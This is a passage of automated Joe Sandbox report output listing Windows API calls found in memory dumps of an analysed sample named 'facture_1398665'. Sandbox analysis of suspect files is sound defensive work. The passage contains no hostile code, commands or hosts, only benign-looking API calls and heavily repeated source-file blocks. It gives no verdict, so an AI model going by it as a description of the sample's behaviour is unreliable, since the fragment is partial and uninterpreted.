    • GetDriveTypeW.KERNEL32(00000000,00000000,00000000,004CA31C,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004CA2CD
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • SetActiveWindow.USER32(?), ref: 004C7846
      • Part of subcall function 0048148C: GetActiveWindow.USER32 ref: 004814BB
      • Part of subcall function 0048148C: GetFocus.USER32 ref: 004814C3
      • Part of subcall function 0048148C: RegisterClassW.USER32(00503E00), ref: 004814E4
      • Part of subcall function 0048148C: ShowWindow.USER32(00000000,00000008), ref: 0048157C
      • Part of subcall function 0048148C: SetFocus.USER32(00000000), ref: 00481583
      • Part of subcall function 004C872C: GetSystemMenu.USER32(00000000,00000000), ref: 004C88AE
      • Part of subcall function 004C872C: EnableMenuItem.USER32(00000000,00000000,00000000), ref: 004C88B4
      • Part of subcall function 004FB18C: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 004FB196
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?,00000000,004DF00F,?,?,?,00000000,?,004DF100,00000000,004DF177), ref: 004DEF56
      • Part of subcall function 0047E6BC: GetFullPathNameW.KERNEL32(00000000,00001000,?,?,00000002,?,?,00000000,00000000,004AE62F,00000000,004AE916,?,?,00000000,0050B17C), ref: 0047E6ED
    Strings
    • Warning: SHGetFolderPath failed with code 0x%.8x on folder 0x%.4x, xrefs: 004DEFE7
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?), ref: 0042EBB7
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 0047FD20: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,004803F6,?,00000000,?,00480396,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6), ref: 0047FD3C
    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,004DE361,00000000,004DE566,?,00000005,00000000,00000000), ref: 004DE15F
    Strings
    • Software\Microsoft\Windows\CurrentVersion, xrefs: 004DE12D
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,0042EAF8), ref: 0042EAC6
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetVersion.KERNEL32(00000000,00500BC7), ref: 00500B62
      • Part of subcall function 00469620: GetCurrentProcessId.KERNEL32(?,00000000,004697AB), ref: 00469641
      • Part of subcall function 00469620: GlobalAddAtomW.KERNEL32(00000000), ref: 00469674
      • Part of subcall function 00469620: GetCurrentThreadId.KERNEL32(?,?,00000000,004697AB), ref: 0046968F
      • Part of subcall function 00469620: GlobalAddAtomW.KERNEL32(00000000), ref: 004696C5
      • Part of subcall function 00469620: RegisterWindowMessageW.USER32(00000000,00000000,?,?,00000000,004697AB), ref: 004696DB
      • Part of subcall function 00469620: GetModuleHandleW.KERNEL32(USER32,00000000,00000000,?,?,00000000,004697AB), ref: 0046975E
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,004803F6,?,00000000,?,00480396,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6), ref: 0047FD3C
    Strings
    • Control Panel\Desktop\ResourceLocale, xrefs: 0047FD3A
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • CompareStringW.KERNEL32(00000400,00000000,00000000,?,00000000,?), ref: 00425D28
    • CompareStringW.KERNEL32(00000400,00000001,00000000,?,00000000,?), ref: 00425DB6
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • RegQueryValueExW.ADVAPI32(00000001,?,00000000,00000000,00000000,?,00000000,0047FC34,?,004E0678,00000000,00000000), ref: 0047FB38
    • RegQueryValueExW.ADVAPI32(00000001,?,00000000,00000000,00000000,70000000,00000001,?,00000000,00000000,00000000,?,00000000,0047FC34,?,004E0678), ref: 0047FBA8
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetWindowLongW.USER32(?,000000EC), ref: 0047C5B8
    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047C5C6
      • Part of subcall function 00470AAC: GetWindowLongW.USER32(?,000000EC), ref: 00470ABA
      • Part of subcall function 00470AAC: IsIconic.USER32(?), ref: 00470AE8
      • Part of subcall function 00470AAC: IsWindowVisible.USER32(?), ref: 00470AF8
      • Part of subcall function 00470AAC: ShowWindow.USER32(?,00000000), ref: 00470B15
      • Part of subcall function 00470AAC: SetWindowLongW.USER32(?,000000EC,00000000), ref: 00470B28
      • Part of subcall function 00470AAC: SetWindowLongW.USER32(?,000000EC,00000000), ref: 00470B39
      • Part of subcall function 00470AAC: ShowWindow.USER32(?,00000006), ref: 00470B59
      • Part of subcall function 00470AAC: ShowWindow.USER32(?,00000005), ref: 00470B63
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetCurrentThreadId.KERNEL32(Function_00075C94,?), ref: 00475DF3
    • EnumThreadWindows.USER32(00000000,Function_00075C94,?), ref: 00475DF9
      • Part of subcall function 0045FFF8: EnumChildWindows.USER32(00000000,Function_0005FFB4), ref: 00460054
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 0045F97C: GetClassInfoW.USER32(?,?,?), ref: 0045FA4C
      • Part of subcall function 0045F97C: UnregisterClassW.USER32(?,?), ref: 0045FA77
      • Part of subcall function 0045F97C: RegisterClassW.USER32(?), ref: 0045FA96
      • Part of subcall function 0045F97C: GetWindowLongW.USER32(00000000,000000F0), ref: 0045FAD2
      • Part of subcall function 0045F97C: GetWindowLongW.USER32(00000000,000000F4), ref: 0045FAE7
      • Part of subcall function 0045F97C: SetWindowLongW.USER32(00000000,000000F4,00000000), ref: 0045FAFA
    • SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000014), ref: 004485F0
    • SendMessageW.USER32(00000000,00000192,00000001,00000000), ref: 00448614
      • Part of subcall function 00447DCC: SendMessageW.USER32(00000000,00000195,00000000,00000000), ref: 00447E16
      • Part of subcall function 00448344: SendMessageW.USER32(00000000,00000197,?,00000000), ref: 00448365
      • Part of subcall function 00449168: SendMessageW.USER32(00000000,000001A7,?,00000000), ref: 004491A7
      • Part of subcall function 004492D8: SendMessageW.USER32(00000000,00000194,?,00000000), ref: 004492F9
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 004ACF58: Wow64DisableWow64FsRedirection.KERNEL32(?,00000000,004AD572,?,00000000,00000000,00000000,00000000,?,004FE5FF,00000000,004FE609,?,00000000,00000000,00000000), ref: 004ACF73
      • Part of subcall function 004ACF58: SetLastError.KERNEL32(00000001,00000000,004AD572,?,00000000,00000000,00000000,00000000,?,004FE5FF,00000000,004FE609,?,00000000,00000000,00000000), ref: 004ACF8A
    • MoveFileW.KERNEL32(00000000,00000000), ref: 004AD4FA
    • GetLastError.KERNEL32(00000000,00000000,00000000,004AD520), ref: 004AD502
      • Part of subcall function 004ACF94: Wow64RevertWow64FsRedirection.KERNEL32(?,004AD5BB,004AD5C3,?,00000000,00000000,00000000,00000000,?,004FE5FF,00000000,004FE609,?,00000000,00000000,00000000), ref: 004ACF9D
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetProcAddress.KERNEL32(?,?,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409644
    • GetProcAddress.KERNEL32(?,00000000,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409666
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • SetErrorMode.KERNEL32(00008000,?), ref: 00413C42
    • LoadLibraryW.KERNEL32(00000000), ref: 00413C71
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • SetWindowTextW.USER32(?,00000000), ref: 0047BF58
    • SetWindowTextW.USER32(?,00000000), ref: 0047BF6E
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • SHGetKnownFolderPath.SHELL32(005045B0,00008000,00000000,?), ref: 004DE4BA
    • CoTaskMemFree.OLE32(?), ref: 004DE4F0
      • Part of subcall function 004DE1CC: RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,004DE54B,00000000,004DE566,?,00000005,00000000,00000000,?,004FCCF4), ref: 004DE22E
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 004714C4: GetWindowLongW.USER32(00000000,000000F0), ref: 004714E2
      • Part of subcall function 00471AA8: FlatSB_SetScrollProp.COMCTL32(00000000,00000001,?,00000000,?,00000000,?,00471C5D,?,?,?,?), ref: 00471AE6
      • Part of subcall function 00471AA8: FlatSB_SetScrollProp.COMCTL32(00000000,00000001,?,00000000,00000000,00000001,?,00000000,?,00000000,?,00471C5D,?,?,?,?), ref: 00471B17
      • Part of subcall function 00471AA8: FlatSB_SetScrollProp.COMCTL32(00000000,00000001,?,00000000,00000000,00000001,?,00000000,?,00000000,?,00471C5D,?,?,?,?), ref: 00471B48
      • Part of subcall function 00471AA8: FlatSB_SetScrollProp.COMCTL32(00000000,00000001,?,00000000,00000000,00000001,?,00000000,?,00000000,?,00471C5D,?,?,?,?), ref: 00471B79
      • Part of subcall function 00471AA8: FlatSB_SetScrollProp.COMCTL32(00000000,?,00000000,00000000,00000000,00000001,?,00000000,?,00000000,?,00471C5D,?,?,?,?), ref: 00471BA7
    • FlatSB_SetScrollInfo.COMCTL32(00000000,0000001C,0000001C,000000FF,?,?,?), ref: 00471C73
      • Part of subcall function 00471930: FlatSB_GetScrollPos.COMCTL32(00000000,?,?,?,00000000,00471C84,00000000,0000001C,0000001C,000000FF,?,?,?), ref: 004719C8
      • Part of subcall function 00471930: FlatSB_SetScrollPos.COMCTL32(00000000,?,?,000000FF,00000000,?,?,?,00000000,00471C84,00000000,0000001C,0000001C,000000FF), ref: 004719E2
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • SendMessageW.USER32(00000000,000000CF,00000001,00000000), ref: 004435DC
      • Part of subcall function 0040A124: CreateWindowExW.USER32(00000000,TWindowDisabler-Window,00000000,0048159E,?,?,?,00000001,00000000,?,W3K,?), ref: 0040A163
      • Part of subcall function 00414FF4: SendMessageW.USER32(?,?,?,00000000), ref: 00415022
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetTextExtentPoint32W.GDI32(?,00000000,004323C4), ref: 00432382
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • FindResourceW.KERNEL32(00000000,00000000,0000000A), ref: 00423106
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • EnumChildWindows.USER32(00000000,Function_0005FFB4), ref: 00460054
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • LoadStringW.USER32(00000000,00010000,?,00001000), ref: 00408DA1
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 00470BFC: GetCurrentThreadId.KERNEL32(00470BAC,00000000,00000000,00470C70,?,00000000,00470CAE,?,00480F48,?,00000001), ref: 00470C53
      • Part of subcall function 00470BFC: EnumThreadWindows.USER32(00000000,00470BAC,00000000), ref: 00470C59
    • SHPathPrepareForWriteW.SHELL32(00000000,00000000,00000000,00000000), ref: 004C9FEF
      • Part of subcall function 00470CC0: IsWindow.USER32(?), ref: 00470CCE
      • Part of subcall function 00470CC0: EnableWindow.USER32(?,000000FF), ref: 00470CDD
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • SendMessageW.USER32(?,?,?,00000000), ref: 00415022
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
